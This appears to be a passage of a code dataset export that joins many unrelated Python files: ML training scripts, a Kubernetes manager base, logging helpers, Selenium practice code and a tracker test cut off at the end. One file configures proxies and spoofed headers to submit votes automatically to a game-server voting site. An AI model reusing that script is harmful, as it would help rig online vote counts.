dimensions to apply `shifts` to. As with shift, each element\n in dim can itself be a tuple which indicates that multiple shifts will\n be applied in multiple dimensions simultaneously. 
Note that\n corresponding entries of dims and shifts must also match (either both\n ints or both tuples of same length).\n Returns\n -------\n shift: torch.Tensor\n Tensor which can be used to index flattened, split states such that\n\n state = tensor([\\phi_even, \\phi_odd]),\n\n then state[shift] will return a 2xlength tensor:\n\n state[shift] -> tensor([[neighbour right], [neighbour down]])\n\n Example\n -------\n Consider the small example of 2x2 state:\n\n >>> state_2d = torch.arange(4).view(2, 2)\n >>> state_2d\n tensor([[0, 1],\n [2, 3]])\n\n even sites are [0, 3], odd sites are [1, 2]\n\n >>> state_split = torch.tensor([0, 3, 1, 2])\n >>> shift = get_shift(2)\n >>> state_split[shift]\n tensor([[1, 2, 0, 3],\n [2, 1, 3, 0]])\n\n correct nearest neighbours in reference to the original `state_2d` (left and\n down) are given in each row respectively\n\n to see how multiple shifts works, consider the shift (1, 1)\n (left one, up one)\n\n >>> shift = get_shift(2, shifts=((1, 1),), dims=((0, 1),))\n >>> state_split[shift]\n tensor([[3, 0, 2, 1]])\n\n we see that each element of shifts and dims can perform multiple shifts, in\n different dimensions at once.\n\n Notes\n -----\n The conventions for how the shifts are applied are according the torch.roll\n function, shift = +ve rolls the state left and so the indices will refer to\n lattice sights to the right.\n\n See Also\n --------\n torch.roll: https://pytorch.org/docs/stable/torch.html#torch.roll\n\n \"\"\"\n if len(shifts) != len(dims):\n raise ShiftsMismatchError(\n \"Number of shifts and number of dimensions: \"\n f\"{len(shifts)} and {len(dims)} do not match.\"\n )\n\n shift_index = torch.zeros(\n len(shifts), self.length * self.length, dtype=torch.long\n )\n for i, (shift, dim) in enumerate(zip(shifts, dims)):\n # each shift, roll the 2d state-like indices and then flatten and split\n shift_index[i, :] = self.split_ind_like_state.roll(\n shift, dims=dim\n ).flatten()[self.flat_ind_like_split]\n return shift_index\n","sub_path":"anvil/geometry.py","file_name":"geometry.py","file_ext":"py","file_size_in_byte":5525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"495661278","text":"\"\"\"\nCreated on Thu May 10 09:37:00 2018\n\n@author: jercas\n\"\"\"\n\nfrom sklearn.metrics import classification_report\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.linear_model import LogisticRegression\nimport argparse\n# pickle: used to serialize LogisticRegression model to disk after training.\nimport pickle\nimport h5py\n\ndef main():\n\t# Construct the argument parse and parse the arguments.\n\tap = argparse.ArgumentParser()\n\tap.add_argument(\"-d\", \"--database\", required=True, help=\"path HDF5 database\")\n\tap.add_argument(\"-m\", \"--model\", required=True, help=\"path to output model\")\n\tap.add_argument(\"-j\", \"--jobs\", type=int, default=-1, help=\"# of jobs to run when tuning hyperparameters\")\n\targs = vars(ap.parse_args())\n\n\t# Open the HDF5 database for reading then determine the index of the training and testing split, provided that this data\n\t#was 'already shuffled' prior to writing it to disk.\n\tdb = h5py.File(args[\"database\"], \"r\")\n\t# The boundary of training set(~[:i]) and test set(~[i:]).\n\ti = int(db[\"labels\"].shape[0] * 0.75)\n\n\t# Define the set of parameters that we want to tune then start a grid search where we evaluate out model for each value of C.\n\tprint(\"[INFO] tuning hyperparameters...\")\n\tparams = {\"C\": [0.1, 1.0, 
10.0, 100.0, 1000.0, 10000.0]}\n\tmodel = GridSearchCV(LogisticRegression(), params, cv=3, n_jobs=args[\"jobs\"])\n\tmodel.fit(db[\"features\"][:i], db[\"labels\"][:i])\n\n\t# Once the best hyperparameters be founded.\n\tprint(\"[INFO] best hyperparameter: {}\".format(model.best_params_))\n\n\t# Evaluate the model.\n\tprint(\"[INFO] evaluating...\")\n\tpreds = model.predict(db[\"features\"][i:])\n\tprint(classification_report(db[\"labels\"][i:], preds, target_names=[lb_name.split('/')[-1] for lb_name in db[\"label_names\"]]))\n\n\t# Serialize the model to disk.\n\tprint(\"[INFO] saving model...\")\n\tf = open(args[\"model\"], \"wb\")\n\tf.write(pickle.dumps(model.best_estimator_))\n\n\t# End buffer stream.q\n\tf.close()\n\tdb.close()\n\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"selfImplementation/PB/LogisticRegression_extractFeatures.py","file_name":"LogisticRegression_extractFeatures.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"336175014","text":"import os ,configparser,requests,re,sys\nimport urllib.parse\nfrom msvcrt import getch\n\nclass package_api:\n def load():\n loadconfig = configparser.RawConfigParser()\n loadconfig.readfp(open(r'control/config.txt'))\n # > load control/config.txt\n key = loadconfig.get('default', 'key')\n userid = loadconfig.get('default', 'userid')\n server_id = loadconfig.get('default', 'server_id')\n proxy = loadconfig.get('default', 'proxy')\n proxy_Source = loadconfig.get('proxymode', 'Source')\n proxy_destination = loadconfig.get('proxymode', 'destination')\n proxy_blacklist = loadconfig.get('proxymode', 'blacklist')\n genproxy = loadconfig.get('proxymode', 'genproxy')\n maxproxy = loadconfig.get('proxymode', 'maxproxy')\n proxyfix = int(loadconfig.get('protect', 'proxyfix'))\n logfail = int(loadconfig.get('protect', 'log_FAIL'))\n proxyfix = int(loadconfig.get('protect', 'proxyfix'))\n manyfail = int(loadconfig.get('protect','mf'))\n\n # set url api playserver\n url_server = ('https://playserver.in.th/index.php/Server/')\n url_vote = (\"https://playserver.in.th/index.php/Vote/prokud/\")\n url_image = (\"http://playserver.co/index.php/VoteGetImage/\")\n # set url server from id ----\n try:\n rquest_unpack = requests.get(url_server+str(server_id))\n unpack_text = re.search(url_vote+'(.+?)\"',rquest_unpack.text)\n unpack_unicode = (unpack_text.group(1))\n unpack_Entities = urllib.parse.quote(unpack_unicode)\n except:\n print('\\n Please Check you config.txt/ server_id !! 
')\n junk = getch()\n sys.exit()\n\n url_getpic = (\"http://playserver.co/index.php/Vote/ajax_getpic/\"+unpack_Entities)\n url_submitpic = (\"http://playserver.co/index.php/Vote/ajax_submitpic/\"+unpack_Entities)\n header = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Referer\": (url_vote+unpack_Entities)\n }\n # svae data ; return data\n data = {'key':key, 'server':server_id, 'userid':userid, 'url_image': url_image, 'url_getpic': url_getpic, 'url_post': url_submitpic, 'header': header, 'proxy': proxy,'proxy_Source':proxy_Source,'proxy_destination':proxy_destination,'logfail':logfail,'proxyfix':proxyfix,'proxy_blacklist':proxy_blacklist,'manyfail':manyfail,'genproxy':genproxy,'maxproxy': int(maxproxy) }\n return data\n","sub_path":"package/PservernApi.py","file_name":"PservernApi.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"309578323","text":"# Copyright 2016 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n\n\nclass K8sBaseResource(object):\n \"\"\"docstring for K8sBaseResource\"\"\"\n\n def __init__(self, manager, data):\n self._manager = manager\n self._add_details(data)\n\n def __repr__(self):\n reprkeys = sorted(k\n for k in self.__dict__.keys()\n if k[0] != '_' and\n k not in ['manager'])\n info = \", \".join(\"%s=%s\" % (k, getattr(self, k)) for k in reprkeys)\n return \"<%s %s>\" % (self.__class__.__name__, info)\n\n @property\n def api_version(self):\n return self._data.api_version\n\n def _add_details(self, data):\n self._data = data\n for k in [k for k in dir(data)\n if not any((k.startswith('_'), k in ('to_dict', 'to_str')))]:\n try:\n setattr(self, k, getattr(data, k))\n except AttributeError:\n # In this case we already defined the attribute on the class\n pass\n\n def __eq__(self, other):\n if not isinstance(other, K8sBaseResource):\n return NotImplemented\n # two resources of different types are not equal\n if not isinstance(other, self.__class__):\n return False\n return self._info == other._info\n\n\nclass K8sBaseManager(object):\n\n resource_class = None\n\n def __init__(self, api, namespace):\n self._api = api\n self._namespace = namespace\n self._raw = None\n\n @property\n def api(self):\n return self._api\n\n @property\n def namespace(self):\n return self._namespace\n\n def get(self, *args, **kwargs):\n if not hasattr(self, '_get'):\n raise NotImplementedError(\n '{} does not have {}'.format(self, '_get'))\n\n return self.resource_class(self, self._get(*args, **kwargs))\n\n def list(self, *args, **kwargs):\n if not hasattr(self, '_list'):\n raise NotImplementedError(\n '{} does not have {}'.format(self, '_list'))\n\n lst = self._list(*args, **kwargs)\n\n return [self.resource_class(self, item) for item in lst.items]\n\n def create(self, *args, **kwargs):\n if not hasattr(self, '_create'):\n raise NotImplementedError(\n '{} does not 
have {}'.format(self, '_create'))\n return self.resource_class(self, self._create(*args, **kwargs))\n\n def replace(self, *args, **kwargs):\n if not hasattr(self, '_replace'):\n raise NotImplementedError(\n '{} does not have {}'.format(self, '_replace'))\n return self._replace(*args, **kwargs)\n\n def delete(self, *args, **kwargs):\n if not hasattr(self, '_delete'):\n raise NotImplementedError(\n '{} does not have {}'.format(self, '_delete'))\n return self._delete(*args, **kwargs)\n\n def deletecollection(self, *args, **kwargs):\n if not hasattr(self, '_deletecollection'):\n raise NotImplementedError(\n '{} does not have {}'.format(self, '_deletecollection'))\n return self._deletecollection(*args, **kwargs)\n","sub_path":"fuel_ccp_tests/managers/k8s/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"334977634","text":"import logging\nimport platform\n\nfrom handler import attach_file_handler, attach_console_handler\n\ndef logger_factory(logger_name: str) -> logging.Logger:\n \n logger = logging.getLogger(logger_name)\n logger.setLevel(logging.DEBUG)\n \n attach_file_handler(logger, logging.DEBUG)\n attach_file_handler(logger, logging.INFO)\n attach_file_handler(logger, logging.WARNING)\n\n attach_console_handler(logger, logging.DEBUG)\n\n return logger\n\nclass LoggerMeta(type):\n def __init__(cls, name, bases, attrs, **kwargs) -> None:\n super().__init__(name, bases, attrs)\n\n # explicit name mangling\n logger_attribute_name = '_' + cls.__name__ + '__logger'\n \n # ignore inheritance from Logger(Base) for logger name in (Derived)\n if len(cls.mro()) > 2:\n logger_name = f'[ {\".\".join([c.__name__ for c in cls.mro()[-3::-1]])} ]'\n else:\n logger_name = f'[ {str(cls.mro()[-2].__name__)} ]'\n\n setattr(cls, logger_attribute_name, logger_factory(logger_name))\n\nclass Logger(metaclass=LoggerMeta):\n pass","sub_path":"src/logging/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"197538941","text":"# @Time : 28/7/20 11:43\n# @Author : KarKin\n# @FileName: worker.py\n\nimport pickle\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\n\n\nclass LinearModel(object):\n\n def __init__(self, dataset, path = None):\n \n self.model_path = path\n \n if not path:\n self.model = LinearRegression()\n self.dataset = dataset\n else:\n with open(path, 'rb') as f:\n self.model = pickle.load(f) \n\n def train(self):\n\n if self.model_path:\n return \n\n x = self.dataset.data\n y = self.dataset.target\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=5)\n self.model.fit(x_train, y_train)\n\n with open('./algo/linear_regression.pkl', 'wb') as f:\n pickle.dump(self.model, f)\n\n\n\n\nmodel = LinearModel(datasets.load_boston())\nmodel.train()\n\n","sub_path":"algo/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"456811360","text":"from datetime import datetime\n\nclass todo_item:\n\n def __init__(self, mongo_id, title, description, due_date, status, last_updated):\n self.mongo_id = mongo_id\n self.title = title\n self.description = description\n self.due_date = due_date\n self.status = status\n 
self.last_updated = self.format_updated(last_updated)\n\n\n def format_updated(self, last_updated):\n iso_date = datetime.strptime(last_updated, '%Y-%m-%dT%H:%M:%S.%fZ')\n simple_date = iso_date.strftime('%d/%m/%Y')\n python_updated = datetime.strptime(simple_date, \"%d/%m/%Y\")\n return python_updated\n ","sub_path":"todo_app/todo_item.py","file_name":"todo_item.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"280519385","text":"'''\n* Copyright (c) 2019 Carnegie Mellon University, Author \n*\n* Not licensed for commercial use. For research and evaluation only.\n*\n'''\nimport torch\nimport torch.autograd as autograd\nimport torch.nn as nn\nfrom torchvision import transforms, utils\nfrom torch.utils.data import Dataset, DataLoader\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport cv2\nimport numpy as np\nfrom utils import *\nfrom data import transformation as tf\nimport data.data_loader\nimport loss.loss_functions\nimport models.VONet\nimport visualization.my_visualizer as visualizer\nimport evaluate\nfrom options import parse as parse\nfrom hw import learning\n\ntorch.manual_seed(100) # random seed generate random number\n\n\ndef main():\n\n args = parse()\n print(args)\n model,data,loss_func,opti,vis = initialization(args)\n print(model,data,loss_func,opti,vis)\n \n learning_framework = learning.Learning(model,data,opti,loss_func,vis)\n\n learning_framework.train(10)\n \ndef testing(dataloader,vis_para):\n forward_visual_result = []\n ground_truth = []\n epoch_loss = 0\n for i_batch, sample_batched in enumerate(dataloader):\n model.zero_grad()\n batch_loss,result = pad_update(model,sample_batched,with_attention_flag = args.attention_flag,pad_flag = flag.pad_flag)\n\n epoch_loss+=batch_loss\n temp_f = weighted_mean_motion(result,args.attention_flag)\n gt_f_12 = sample_batched['motion_f_01'].numpy()\n forward_visual_result = np.append(forward_visual_result,temp_f)\n ground_truth = np.append(ground_truth,gt_f_12)\n epoch_loss_mean = epoch_loss*args.batch_size\n forward_result = forward_result.reshape(-1,6)*kitti_dataset.motion_stds\n ground_truth = ground_truth.reshape(-1,6)*kitti_dataset.motion_stds\n forward_visual_result_m = tf.ses2poses(forward_visual_result)\n ground_truth_m = tf.ses2poses(ground_truth)\n errors = evaluate.evaluate(ground_truth_m,forward_visual_result_m)\n vis_para.vis.plot_path_with_gt(forward_visual_result_m,ground_truth_m,vis_para.win_number,vis_para.title)\n return errors,epoch_loss_mean\n\ndef initialization(args):\n # parameters and flags\n input_batch_size = args.batch_size\n\n #camera_parameter=[450,180,225,225,225,90]\n #camera_parameter=[651,262,651,651,320,130]\n camera_parameter=[640,180,640,640,320,90]\n image_size = (camera_parameter[1],camera_parameter[0])\n\n ################## init model###########################\n model = models.VONet.PADVONet(coor_layer_flag = args.coor_layer_flag).float()\n if args.use_gpu_flag:\n #model = nn.DataParallel(model.cuda())\n model = model.cuda()\n if args.finetune_flag:\n model.load_state_dict(torch.load(args.model_load))\n ### init optimizer\n optimizer = optim.Adam(model.parameters(), lr=0.01)\n lr_scheduler = optim.lr_scheduler.LambdaLR(optimizer, lr_lambda=LambdaLR(200, 0,50).step)\n opti = learning.LearningOptim(optimizer,lr_scheduler)\n ################### load data####################\n # training data\n motion_files_path = args.motion_path\n path_files_path = args.image_list_path\n # 
transform\n transforms_ = [\n transforms.Resize(image_size),\n transforms.ColorJitter(brightness=0.1, contrast=0.1, saturation=0.1, hue=0.1),\n transforms.ToTensor(),\n transforms.Normalize((0.5,0.5,0.5), (0.5,0.5,0.5)) ]\n kitti_dataset = data.data_loader.SepeDataset(path_to_poses_files=motion_files_path,path_to_image_lists=path_files_path,transform_=transforms_,camera_parameter = camera_parameter,coor_layer_flag = args.coor_layer_flag)\n\n learning_data = learning.LearningData()\n learning_data.input_label='image_f_01'\n learning_data.output_label ='motion_f_01'\n learning_data.data_loader_train = DataLoader(kitti_dataset, batch_size=input_batch_size,shuffle=True ,num_workers=1,drop_last=True)\n learning_data.data_loader_vis = DataLoader(kitti_dataset, batch_size=input_batch_size,shuffle=False ,num_workers=1,drop_last=True)\n # testing data\n motion_files_path_test = args.motion_path_test\n path_files_path_test = args.image_list_path_test\n # transform\n transforms_ = [\n transforms.Resize(image_size),\n transforms.ToTensor(),\n transforms.Normalize((0.5,0.5,0.5), (0.5,0.5,0.5)) ]\n kitti_dataset_test = data.data_loader.SepeDataset(path_to_poses_files=motion_files_path_test,path_to_image_lists=path_files_path_test,transform_=transforms_,camera_parameter = camera_parameter,norm_flag=1,coor_layer_flag = args.coor_layer_flag)\n learning_data.data_loader_vid = DataLoader(kitti_dataset_test, batch_size=input_batch_size,shuffle=False ,num_workers=4,drop_last=True)\n\n #########################init visualizer##########################################\n vis = visualizer.Visualizer(args.visdom_ip,args.visdom_port)\n\n #########################loss function ##########################################\n loss_func = nn.MSELoss\n if args.attention_flag:\n loss_func = loss.loss_functions.GroupWithATTLoss\n elif args.pad_flag:\n #loss_func = loss.loss_functions.GroupWithSSLoss \n loss_func = loss.loss_functions.SingleShotLoss\n else:\n loss_func = loss.loss_functions.GroupLoss \n \n return model,learning_data,loss_func,opti,vis\n\ndef weighted_mean_motion(predicted_result,with_attention_flag=False):\n predict_f_12 = predicted_result[0]\n att_f_12 = predicted_result[1]\n if len(predicted_result)==4:\n predict_b_21 = predicted_result[2]\n att_b_21 = predicted_result[3]\n predict_f_12 = torch.cat((predict_f_12,-predict_b_21),2)\n att_f_12 = torch.cat((att_f_12,att_b_21),2)\n att_temp_f = att_f_12.cpu().data.numpy()\n temp_f = predict_f_12.cpu().data.numpy()\n\n if with_attention_flag==False:\n att_temp_f=np.ones(att_temp_f.shape)\n\n#weighted average\n att_temp_f_e = -att_temp_f*np.exp(att_temp_f)\n temp_f_w = temp_f*att_temp_f_e\n temp_f_w_s = np.sum(np.sum(temp_f_w,2),2)\n att_temp_s = np.sum(np.sum(att_temp_f_e,2),2)\n temp_f = temp_f_w_s/att_temp_s\n return temp_f\n\n\ndef pad_update(model,sample_batched,with_attention_flag=False,use_gpu_flag=True,pad_flag=False):\n model.zero_grad()\n input_batch_images_f_12 = sample_batched['image_f_01']\n input_batch_motions_f_12 = sample_batched['motion_f_01']\n input_batch_images_b_21 = sample_batched['image_b_10']\n input_batch_motions_b_21 = sample_batched['motion_b_10']\n if use_gpu_flag:\n input_batch_images_f_12 = input_batch_images_f_12.cuda()\n input_batch_motions_f_12 = input_batch_motions_f_12.cuda()\n input_batch_images_b_21 = input_batch_images_b_21.cuda()\n input_batch_motions_b_21 = input_batch_motions_b_21.cuda()\n predict_f_12,att_f_12 = model(input_batch_images_f_12)\n predict_b_21,att_b_21 = model(input_batch_images_b_21)\n 
result=[predict_f_12,att_f_12,predict_b_21,att_b_21]\n\n # loss calculation\n if with_attention_flag:\n batch_loss = loss.loss_functions.GroupWithATTLoss(\\\n predict_f_12, input_batch_motions_f_12,att_f_12, \\\n predict_b_21,input_batch_motions_b_21,att_b_21)\n elif pad_flag:\n batch_loss = loss.loss_functions.GroupWithSSLoss(\\\n predict_f_12, input_batch_motions_f_12, \\\n predict_b_21,input_batch_motions_b_21)\n\n else:\n batch_loss = loss.loss_functions.GroupLoss(\\\n predict_f_12, input_batch_motions_f_12, \\\n predict_b_21,input_batch_motions_b_21)\n\n return batch_loss,result\n\nif __name__ == '__main__':\n main()\n\n\n","sub_path":"src/padvo_train.py","file_name":"padvo_train.py","file_ext":"py","file_size_in_byte":7706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"121049831","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Encoder(nn.Module):\n\n def __init__(self, img_height, img_width, enc_size):\n '''\n args:\n img_height: height of image\n img_width: width of image\n enc_size: length of encoding vector\n '''\n super(Encoder, self).__init__()\n self.conv1 = nn.Conv2d(\n 3, 32, kernel_size=5, padding=2, stride=2)\n self.conv2 = nn.Conv2d(\n 32, 64, kernel_size=5, padding=2, stride=2)\n img_size = torch.tensor([img_height, img_width])\n self.num_conv_features = 64 * torch.prod(img_size / 4)\n self.fc = nn.Linear(self.num_conv_features, enc_size)\n\n def forward(self, x):\n '''\n args:\n x: input image\n returns:\n e: encoding vector\n '''\n print('x:', x.type(), x.size())\n x = F.relu(self.conv1(x))\n x = F.relu(self.conv2(x))\n x = x.view(-1, self.num_conv_features)\n e = self.fc(x)\n print('e:', e.type(), e.size())\n return e\n\n\nclass Memory(nn.Module):\n\n def __init__(self, enc_size, mem_size):\n '''\n args:\n enc_size: length of e vector\n mem_size: number of rows of Mkey and Mval\n '''\n super(Memory, self).__init__()\n # # TODO: better init method\n self.Wkey = nn.Parameter(torch.rand(mem_size, enc_size))\n self.Wval = nn.Parameter(torch.rand(mem_size, enc_size))\n\n def forward(self, E, h):\n '''\n args:\n E: matrix of encodings\n h: hidden vector\n returns:\n o: memory output vector\n '''\n # write\n Mkey = torch.matmul(self.Wkey, E)\n Mval = torch.matmul(self.Wval, E)\n\n # read\n h = h.unsqueeze(1)\n print('h:', h.type(), h.size())\n print('Mkey:', Mkey.type(), Mkey.size())\n p = F.softmax(torch.matmul(h, Mkey))\n p = p.transpose(1, 2)\n print('p:', p.type(), p.size())\n print('Mval:', Mval.type(), Mval.size())\n o = torch.matmul(Mval, p)\n o = o.squeeze()\n print('o:', o.type(), o.size())\n\n return o\n\n\nclass MLP(nn.Module):\n\n def __init__(self, context_size, mem_size, num_actions):\n '''\n args:\n context_size: length of context vector\n mem_size: number of rows of Mkey and Mval\n num_actions: number of available actions\n '''\n super(MLP, self).__init__()\n self.Wh = nn.Linear(context_size, mem_size, bias=False)\n self.Wq = nn.Linear(mem_size, num_actions, bias=False)\n\n def forward(self, h, o):\n '''\n args:\n h: context vector\n o: memory read vector\n returns:\n Q: vector of Q-values for each action\n '''\n # Minecraft paper used relu on half of hidden layer\n g = F.relu(self.Wh(h) + o)\n print('g:', g.type(), g.size())\n Q = self.Wq(g)\n return Q\n\n\nclass MQN(nn.Module):\n\n def __init__(self, img_height, img_width, enc_size, mem_size, num_actions):\n '''\n args:\n img_height: height of input image\n img_width: width of input image\n enc_size: length of 
encoding vector\n mem_size: number of rows of Mkey and Mval (=context_size)\n num_actions: number of available actions\n '''\n super(MQN, self).__init__()\n self.encoder = Encoder(img_height, img_width, enc_size)\n self.memory = Memory(enc_size, mem_size)\n # generates context vector\n self.Wc = nn.Linear(enc_size, mem_size, bias=False)\n self.mlp = MLP(mem_size, mem_size, num_actions)\n\n def forward(self, x, X):\n '''\n args:\n x: input image\n X: stacked previous images\n returns:\n Q: vector of quality for each action\n '''\n e = self.encoder(x)\n h = self.Wc(e)\n # generate encodings from observations\n E = []\n for i in range(X.size(1)):\n img = X[:, i, :, :, :].squeeze(1)\n e = self.encoder(img)\n e = e.unsqueeze(2)\n E.append(e)\n E = torch.cat(E, 2)\n print('E:', E.size())\n o = self.memory(E, h)\n Q = self.mlp(h, o)\n return Q\n\n\nif __name__ == '__main__':\n b = 32\n e = 10\n M = 25\n m = 5\n X = torch.rand(b, M, e)\n lin = nn.Linear(e, m)\n y = lin(X)\n print('y:', y.size())\n print(y)\n","sub_path":"MQN.py","file_name":"MQN.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"323060894","text":"from collections import namedtuple\n\nNAVY_SEAL = \"no.\"\nMODE_INT_TO_STRING = {\n 1: 'Single Elimination',\n 2: 'Double Elimination'\n}\nGENDER_INT_TO_STRING = {\n 0: \"😐\",\n 1: \"🚹\",\n 2: \"🚺\",\n 3: \"🚁\"\n}\n\nflash_categories = namedtuple('flash_type', ['message', 'error', 'warning', 'success'])\nSTYLE = flash_categories('primary', 'danger', 'warning', 'success')\n","sub_path":"lol9k1/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"471446974","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom time import sleep\n\nclass Desafio:\n def __init__(self):\n chrome_options = Options()\n chrome_options.add_argument('--lang=pt-BR')\n self.driver = webdriver.Chrome(\n executable_path=r'./chromedriver.exe', options=chrome_options)\n\n \n def Iniciar(self):\n self.driver.get(\"https://cursoautomacao.netlify.app/\")\n pagina_desafios = self.driver.find_element_by_xpath(\"//a[text()='Desafios']\")\n pagina_desafios.click()\n sleep(2)\n checkbox_conversivel = self.driver.find_element_by_id(\"conversivelcheckbox\")\n checkbox_offroad = self.driver.find_element_by_id(\"offroadcheckbox\")\n sleep(2)\n if not checkbox_conversivel.is_selected():\n self.driver.execute_script(\"arguments[0].click()\", checkbox_conversivel)\n\n if not checkbox_offroad.is_selected():\n self.driver.execute_script(\"arguments[0].click()\", checkbox_offroad)\n\n\n\ndesafio = Desafio()\ndesafio.Iniciar()","sub_path":"mestre_web/desafios/desafio_interagindo_com_checkbox.py","file_name":"desafio_interagindo_com_checkbox.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"199637542","text":"'''\nCollection of Feature engineering functions.\n'''\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom textblob import TextBlob\n\n\ndef filter_encoder(df):\n le = LabelEncoder()\n df['filters'] = le.fit_transform(df['filters'])\n return df\n\n\ndef num_tags(df):\n df['hashtags'] = df.hashtags.apply(lambda x: len(x))\n df['caption_hashtags'] = df.caption_hashtags.apply(lambda x: len(x))\n return df\n\n\ndef sentiment_encoder(df):\n\n # list fields to apply 
sentiment analysis\n sent_fields = []\n\n # apply sentiment analysis for each field of text data, obtaining polarity\n # (neg < neutral < pos: range [-1,1]) and subjectivity (object <\n # subjective: range [0,1])\n for field in sent_fields:\n df[str(field_) + 'polarity'] = df.apply(lambda x: TextBlob(x[field]\n ).sentiment.polarity, axis=1)\n df[str(field_) + 'subjectivity'] = df.apply(lambda x: TextBlob(x[field]\n ).sentiment.subjectivity, axis=1)\n return df\n","sub_path":"app/feature_engineering.py","file_name":"feature_engineering.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"318122926","text":"from threading import Thread\n\nimport numpy as np\n\nimport matplotlib\nmatplotlib.use('QT5Agg')\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib.patches import Ellipse\n\nfrom pubsub import pub\nfrom random import uniform, randint\nfrom time import sleep\n\nfrom src.tracking.map import Map\nfrom src.utils.time_in_millis import time_in_millis\n\nclass TrackerTest(Thread):\n \"\"\"Integration test for tracking system\"\"\"\n def __init__(self):\n super().__init__()\n\n \"\"\"Initializes tracker test\"\"\"\n self.update_interval = 0.25\n\n # initialize map\n self.map = Map(None, True)\n\n # create polar plot\n self.fig = plt.figure()\n self.polar = self.fig.add_subplot(111, projection='polar')\n self.polar.set_ylim(0, 200)\n self.polar.grid(True)\n self.polar.set_title('Tracker Map')\n\n # set up rng, bearing, and type data lists for tracks\n self.covar_ellipses = []\n\n # set up rng, bearing, and type data lists for tracks\n self.det_rng_data = [0]\n self.det_bearing_data = [0]\n self.det_type_data = [0]\n self.dets = self.polar.scatter(self.det_rng_data, self.det_bearing_data, c='#ff4444', label='Detections', s=3)\n\n # set up legend\n box = self.polar.get_position()\n self.polar.set_position([box.x0, box.y0 + box.height * 0.1,\n box.width, box.height * 0.9])\n\n # Put a legend below current axis\n self.polar.legend(loc='upper center', bbox_to_anchor=(0.5, -0.05),\n fancybox=True, shadow=True, ncol=5)\n\n # color plot grey\n self.polar.set_facecolor('#F5F5F5')\n self.polar.set_alpha(0.2)\n\n # show plot (and set up blitting)\n plt.show(block=False)\n plt.pause(0.01)\n self.fig.canvas.draw()\n\n input('Make plot full screen then press enter')\n self.background = self.fig.canvas.copy_from_bbox(self.polar.bbox)\n\n # create initial detections\n num_initial_detections = 18\n # patterns: static, circle_CCW, circle_CW, circle_CCW_radial_out, circle_CW_radial_out, radial_out\n self.rng_rate_list = [0, 0, 0, 0.05, 0.05, 0.075] * 3\n self.bearing_rate_list = [0, 0.0375, -0.0375, 0.025, -0.025, 0] * 3\n self.frame_bounds = [(10, 175), (-180, 180)]\n self.spawn_detections(num_initial_detections)\n\n # set look frame parameters\n self.look_frame = 'aperture' #'full'\n self.look_rng = (0, 150) # initial (and perm) range range of look aperture\n self.look_bearing = (-70, 70) # initial bearing range of look aperture\n self.look_sweep = (-30, 30) # sweeps so that the center of the aperture goes between these two points\n self.pan_direction = 1 # direction of pan (+1 = CW, -1 = CCW)\n self.look_apertures = []\n self.num_apertures = 1\n\n # detection parameters\n self.detect_mode = 'regular' #'constant' #'random'\n self.detect_probability = 0.6\n\n # start tracker\n self.map.start()\n\n # initialize old update time (of detection)\n self.prev_time = [time_in_millis()] * num_initial_detections\n\n def 
